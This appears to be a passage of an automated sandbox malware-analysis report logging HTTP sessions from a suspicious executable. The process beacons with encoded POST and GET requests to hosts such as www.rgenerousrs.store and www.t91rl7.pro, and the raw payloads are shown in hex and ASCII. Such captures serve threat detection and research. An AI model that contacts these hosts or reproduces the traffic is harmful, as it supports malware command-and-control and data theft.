                                                        Data Raw: 6c 4a 6f 4c 6c 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 31 55 68 6a 62 68 72 57 67 39 41 34 58 57 34 61 44 41 62 58 74 63 71 51 5a 32 63 44 62 33 70 41 76 76 5a 68 32 2f 72 54 39 2b 57 61 53 58 4a 75 38 48 30 38 6e 46 68 30 5a 43 7a 68 32 4d 5a 71 34 34 67 2b 73 4d 48 76 41 33 6d 33 37 6a 2b 4f 41 77 52 69 47 68 6b 59 33 4f 72 46 66 7a 55 6d 72 55 4b 66 61 6c 44 63 36 44 4f 6c 56 55 65 67 39 63 46 42 6c 4f 6b 58 34 66 77 32 78 6f 36 41 56 43 61 4e 5a 52 6f 43 4d 43 5a 35 61 4a 58 71 6d 67 48 4e 6d 61 73 5a 59 54 2b 41 30 51 37 4e 78 65 55 47 34 65 52 75 6c 49 33 76 49 32 76 4b 53 46 6c 39 67 66 48 4f 6c 58 45 3d
                                                        Data Ascii: lJoLl=IYlouYrI0yQl1UhjbhrWg9A4XW4aDAbXtcqQZ2cDb3pAvvZh2/rT9+WaSXJu8H08nFh0ZCzh2MZq44g+sMHvA3m37j+OAwRiGhkY3OrFfzUmrUKfalDc6DOlVUeg9cFBlOkX4fw2xo6AVCaNZRoCMCZ5aJXqmgHNmasZYT+A0Q7NxeUG4eRulI3vI2vKSFl9gfHOlXE=
                                                        Nov 28, 2024 09:29:51.800188065 CET1097INHTTP/1.1 404 Not Found
                                                        Date: Thu, 28 Nov 2024 08:29:51 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Jqr653oZlxDmzOM9O8GRPnOC77NsMhOEJVABUIKPEe%2F8hKZEXk0j14NL9eQ14wEVEIqQ3ruwQrcz8EWL%2Bx2YxV9KW7yQdwhoFQmRLZRgMsxmTHSozHkYcM1WN6FDL3NbWPQi60faqko%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8e98fe1bcda52394-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1922&min_rtt=1922&rtt_var=961&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=768&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.550001104.21.57.248802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:52.990622997 CET788OUTPOST /o362/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.rgenerousrs.store
                                                        Origin: http://www.rgenerousrs.store
                                                        Referer: http://www.rgenerousrs.store/o362/
                                                        Cache-Control: no-cache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 35 41 76 4c 4a 68 31 36 48 54 2b 2b 57 61 5a 33 4a 52 7a 6e 31 52 6e 46 73 4a 5a 48 54 68 32 4d 6c 71 34 34 77 2b 74 2f 76 73 44 48 6d 35 77 44 2b 4d 4f 51 52 69 47 68 6b 59 33 4f 50 38 66 33 34 6d 72 6b 61 66 62 41 76 62 33 6a 4f 69 57 55 65 67 71 4d 46 46 6c 4f 6b 6c 34 64 46 54 78 75 2b 41 56 47 4b 4e 59 41 6f 42 47 43 5a 7a 58 70 57 75 6c 54 44 48 75 49 59 6c 62 43 66 5a 75 7a 37 73 35 49 6c 73 69 38 5a 47 32 6f 62 58 59 6c 6e 39 44 31 45 55 36 38 58 2b 37 41 52 49 63 61 44 69 37 62 5a 59 32 75 36 6d 36 4d 41 6e 6d 38 64 61
                                                        Data Ascii: lJoLl=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYB5AvLJh16HT++WaZ3JRzn1RnFsJZHTh2Mlq44w+t/vsDHm5wD+MOQRiGhkY3OP8f34mrkafbAvb3jOiWUegqMFFlOkl4dFTxu+AVGKNYAoBGCZzXpWulTDHuIYlbCfZuz7s5Ilsi8ZG2obXYln9D1EU68X+7ARIcaDi7bZY2u6m6MAnm8da
                                                        Nov 28, 2024 09:29:54.465404034 CET1096INHTTP/1.1 404 Not Found
                                                        Date: Thu, 28 Nov 2024 08:29:54 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fRBg2sYtXNbex%2FiDTTrCNVEdXuE1OXsxiYxI2v0RByyaiFjzQy4X3cZXuZsgpQs6YCnokfbttmq%2FMtemQy%2BKtVh0lNoZYHeJhzVpHlkc9WfAjXQGT3RokKTGEE16bx0C1MsinpFgf%2Bo%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8e98fe2c7c9c8c0f-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=883&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=788&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        23192.168.2.550002104.21.57.248802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:55.646843910 CET1805OUTPOST /o362/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.rgenerousrs.store
                                                        Origin: http://www.rgenerousrs.store
                                                        Referer: http://www.rgenerousrs.store/o362/
                                                        Cache-Control: no-cache
                                                        Content-Length: 1242
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 78 41 76 38 68 68 32 5a 66 54 2f 2b 57 61 48 48 4a 55 7a 6e 31 70 6e 46 30 4e 5a 48 58 78 32 4b 68 71 34 65 38 2b 71 4f 76 73 59 33 6d 35 2f 6a 2b 42 41 77 51 34 47 68 30 44 33 4f 66 38 66 33 34 6d 72 69 57 66 50 6c 44 62 6b 54 4f 6c 56 55 66 76 39 63 46 74 6c 4f 74 53 34 64 41 6d 32 65 65 41 4d 6d 61 4e 56 53 77 42 4b 43 5a 31 5a 4a 57 49 6c 55 4b 64 75 4d 34 2b 62 43 37 7a 75 7a 44 73 70 4f 49 61 6c 4e 49 52 68 71 54 4c 66 6e 54 4f 53 7a 73 69 35 4f 6d 4c 32 77 6b 75 51 36 62 62 30 39 70 56 39 4d 6e 70 34 39 46 30 6b 34 30 55 77 33 33 51 67 71 46 46 57 4c 34 50 36 7a 66 48 4c 6a 66 66 70 45 6c 2b 41 65 53 38 52 44 67 6c 63 61 77 61 59 6d 7a 70 53 57 79 65 5a 35 6b 41 68 74 77 43 78 51 79 6a 4a 75 79 54 6c 65 73 37 66 34 4f 71 62 50 33 46 72 43 77 73 79 6c 4d 71 62 66 36 48 49 70 43 51 52 48 71 37 77 59 2f 4a 2f 55 53 57 79 64 50 6a 4e 76 34 70 55 61 32 6a [TRUNCATED]
                                                        Data Ascii: lJoLl=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYBxAv8hh2ZfT/+WaHHJUzn1pnF0NZHXx2Khq4e8+qOvsY3m5/j+BAwQ4Gh0D3Of8f34mriWfPlDbkTOlVUfv9cFtlOtS4dAm2eeAMmaNVSwBKCZ1ZJWIlUKduM4+bC7zuzDspOIalNIRhqTLfnTOSzsi5OmL2wkuQ6bb09pV9Mnp49F0k40Uw33QgqFFWL4P6zfHLjffpEl+AeS8RDglcawaYmzpSWyeZ5kAhtwCxQyjJuyTles7f4OqbP3FrCwsylMqbf6HIpCQRHq7wY/J/USWydPjNv4pUa2jthQ9+xx4mXXL/bshwJeHaFw3A5TkOsGrXBx1nCH6pn4il7krw0YylXZi9FgDO6Uv3pCatX3Z/euG8yrZ0hLm6eahLz3fVDXgbDqO6E+z4qrTWxcFaBuNuFeTayzZ1sy4dsUMOLqDFjirPW/Lktmd+66Zp8xnczSFlVsMPCNQVkUH4bacQJFXS19UE0kOC2fn9rco2hvnuNwjS+jlj3inHOs//T5OxTG7HlrfZYGJO2w7gj+V700qXuwCcpSs2uBpsxs4J7xejGcqxYWf+eHVhSRr1AGP6eImIrWZ367l06D1ICWF82MyxNgxfk2Q7wSFASXua5vcQAx97hkkmn5cUezKaz0EV8NJTz8u4Y78YuoSYJEjT3+fKh5YltMgenU0LONNGwUuffyTkP2awYnsWBlTXiBgLDjxD/HokdAAIPR89LS/imFmOQCI1uo+ztOkh3u53fGBBnFeKRYL9TH74j9p567TA+j9zl5Q9YuQFNy/jwFVdDdl7fvnrU1ShPk58f25gDBCMWmpo9fevPxwETpzh78nyYv1HZKsiedS45XvO/fUQsgY2+XeXQrkr6Bd/e0DhfslTYqthJ54Cff0aJF2MjW/Df3PnD6EUH16Qs8SVjfA1zplk0AvbDw+nR11OUz1DX9SxOmPTdBYlArlkmzD7e5klkPBI7 [TRUNCATED]
                                                        Nov 28, 2024 09:29:57.024688959 CET1102INHTTP/1.1 404 Not Found
                                                        Date: Thu, 28 Nov 2024 08:29:56 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZPWEXmc5iHuUIWiSZICRcbRO5HXZEUWtYG1yI3qALfcRNuN26IBJodUb7tNSStHV2VH43kDkrY24YRt%2BVVd2QqHg0%2Bv3ONSaEtHX%2FD%2BnRNGjjBQeAnrLBCavqZ8Pqd1ES5a3KWIJ2ds%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8e98fe3c8c31c335-EWR
                                                        Content-Encoding: gzip
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1472&rtt_var=736&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1805&delivery_rate=0&cwnd=163&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        24192.168.2.550003104.21.57.248802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:29:58.297682047 CET497OUTGET /o362/?QjtpF=dVl4&lJoLl=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqQkrWzQaEMmYHbjlB+9nxdj865RiOaXPy8R35WRqg9vUq/A== HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Language: en-US
                                                        Host: www.rgenerousrs.store
                                                        Connection: close
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Nov 28, 2024 09:29:59.720415115 CET1116INHTTP/1.1 404 Not Found
                                                        Date: Thu, 28 Nov 2024 08:29:59 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q%2BbwOWJD%2F2G4ECvezZR4l31%2FBue3KvF7RFF5oghKdGkhxm1ooxZUdTJN20e3yRn6kcu2kY7CnkR00XxT4XZPBDVm38JPBFQeMc8Eh1wXY6d3bUjD%2BIvwvgQaON9cU0pt8lIXgxer%2BnM%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8e98fe4d6a6141e3-EWR
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1574&rtt_var=787&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=497&delivery_rate=0&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        25192.168.2.550004154.88.22.101802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:30:05.435058117 CET747OUTPOST /jhb8/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.t91rl7.pro
                                                        Origin: http://www.t91rl7.pro
                                                        Referer: http://www.t91rl7.pro/jhb8/
                                                        Cache-Control: no-cache
                                                        Content-Length: 206
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 6f 47 59 41 6e 45 4c 46 45 6f 67 30 64 6b 55 2f 76 2f 63 55 42 79 39 4b 77 57 64 2b 57 30 32 45 79 31 57 58 30 53 66 6b 48 5a 76 32 4f 41 57 31 75 2f 78 51 78 56 57 2b 66 76 66 79 2b 75 41 5a 57 33 6b 57 6a 65 72 59 30 4a 30 69 31 42 6d 69 63 74 46 55 58 69 6d 4a 79 31 31 65 59 46 4b 6a 71 78 52 6e 39 35 77 50 74 63 62 59 5a 74 4e 39 68 6b 49 73 6d 50 69 75 49 59 2f 63 65 6a 61 72 76 75 56 68 6c 37 53 32 46 45 4a 53 50 2f 6c 4d 54 51 43 2f 54 58 43 77 32 43 34 53 42 44 53 38 71 56 6b 44 6c 4f 61 62 5a 52 48 47 31 68 4f 79 78 6e 68 48 46 31 6e 41 76 6b 6b 3d
                                                        Data Ascii: lJoLl=5TfV9gqaBlkLoGYAnELFEog0dkU/v/cUBy9KwWd+W02Ey1WX0SfkHZv2OAW1u/xQxVW+fvfy+uAZW3kWjerY0J0i1BmictFUXimJy11eYFKjqxRn95wPtcbYZtN9hkIsmPiuIY/cejarvuVhl7S2FEJSP/lMTQC/TXCw2C4SBDS8qVkDlOabZRHG1hOyxnhHF1nAvkk=
                                                        Nov 28, 2024 09:30:06.984256983 CET364INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 28 Nov 2024 08:30:06 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Encoding: gzip
                                                        Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 06 fe 2e 61 39 3e 79 81 a6 be 21 19 19 89 95 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 0b 16 56 3f 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 67)N.,(ON,VPV/Ji%IAf>.a9>y!f.6PV?Z0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        26192.168.2.550005154.88.22.101802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:30:08.105695009 CET767OUTPOST /jhb8/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.t91rl7.pro
                                                        Origin: http://www.t91rl7.pro
                                                        Referer: http://www.t91rl7.pro/jhb8/
                                                        Cache-Control: no-cache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                        Data Raw: 6c 4a 6f 4c 6c 3d 35 54 66 56 39 67 71 61 42 6c 6b 4c 36 58 49 41 6b 6e 6a 46 4d 6f 67 33 53 45 55 2f 6b 66 63 51 42 79 35 4b 77 55 78 75 57 6e 53 45 72 55 6d 58 31 54 66 6b 4c 35 76 32 47 67 57 77 68 66 78 74 78 56 61 32 66 71 6e 79 2b 75 55 5a 57 31 38 57 6a 74 54 5a 79 4a 30 33 2b 68 6d 67 54 4e 46 55 58 69 6d 4a 79 31 68 6b 59 46 43 6a 71 46 56 6e 39 59 77 41 79 73 62 62 52 4e 4e 39 6c 6b 49 6f 6d 50 6a 39 49 62 37 32 65 6d 57 72 76 72 70 68 72 4b 53 31 4d 45 4a 51 4c 2f 6c 64 57 7a 76 77 4d 58 2f 6c 33 44 46 4e 66 7a 43 48 76 6a 56 70 2f 73 53 7a 4b 78 72 2b 6c 79 47 46 67 58 41 75 66 57 33 77 78 7a 79 48 5a 33 7a 5a 58 51 74 56 65 50 49 74 53 55 75 43 34 69 58 34
                                                        Data Ascii: lJoLl=5TfV9gqaBlkL6XIAknjFMog3SEU/kfcQBy5KwUxuWnSErUmX1TfkL5v2GgWwhfxtxVa2fqny+uUZW18WjtTZyJ03+hmgTNFUXimJy1hkYFCjqFVn9YwAysbbRNN9lkIomPj9Ib72emWrvrphrKS1MEJQL/ldWzvwMX/l3DFNfzCHvjVp/sSzKxr+lyGFgXAufW3wxzyHZ3zZXQtVePItSUuC4iX4
                                                        Nov 28, 2024 09:30:09.654422045 CET364INHTTP/1.1 200 OK
                                                        Server: nginx
                                                        Date: Thu, 28 Nov 2024 08:30:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Encoding: gzip
                                                        Data Raw: 36 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 29 4e 2e ca 2c 28 b1 cb c9 4f 4e 2c c9 cc cf 8b 56 cf 50 d7 56 2f 4a 05 12 69 ea b1 0a b6 0a 89 25 f9 49 1a ea 89 1e 41 06 c9 1e be 66 3e 95 16 06 fe 2e 61 39 3e 79 81 a6 be 21 19 19 89 95 a6 e5 c9 b9 16 66 fe 2e d9 15 be 81 b6 b6 ea 9a 36 fa 50 13 01 0b 16 56 3f 5a 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 67)N.,(ON,VPV/Ji%IAf>.a9>y!f.6PV?Z0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        27192.168.2.550006154.88.22.101802788C:\Program Files (x86)\UwMmcoHDYcXXOqwNqOdEEBferJOwpKVpjlRREIZjvCikJhnXquGrcOzpIXbMGrXAHVmrZ\hvGvYDBEAaXP.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 28, 2024 09:30:10.772250891 CET1784OUTPOST /jhb8/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US
                                                        Host: www.t91rl7.pro
                                                        Origin: http://www.t91rl7.pro
                                                        Referer: http://www.t91rl7.pro/jhb8/
                                                        Cache-Control: no-cache
                                                        Content-Length: 1242
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
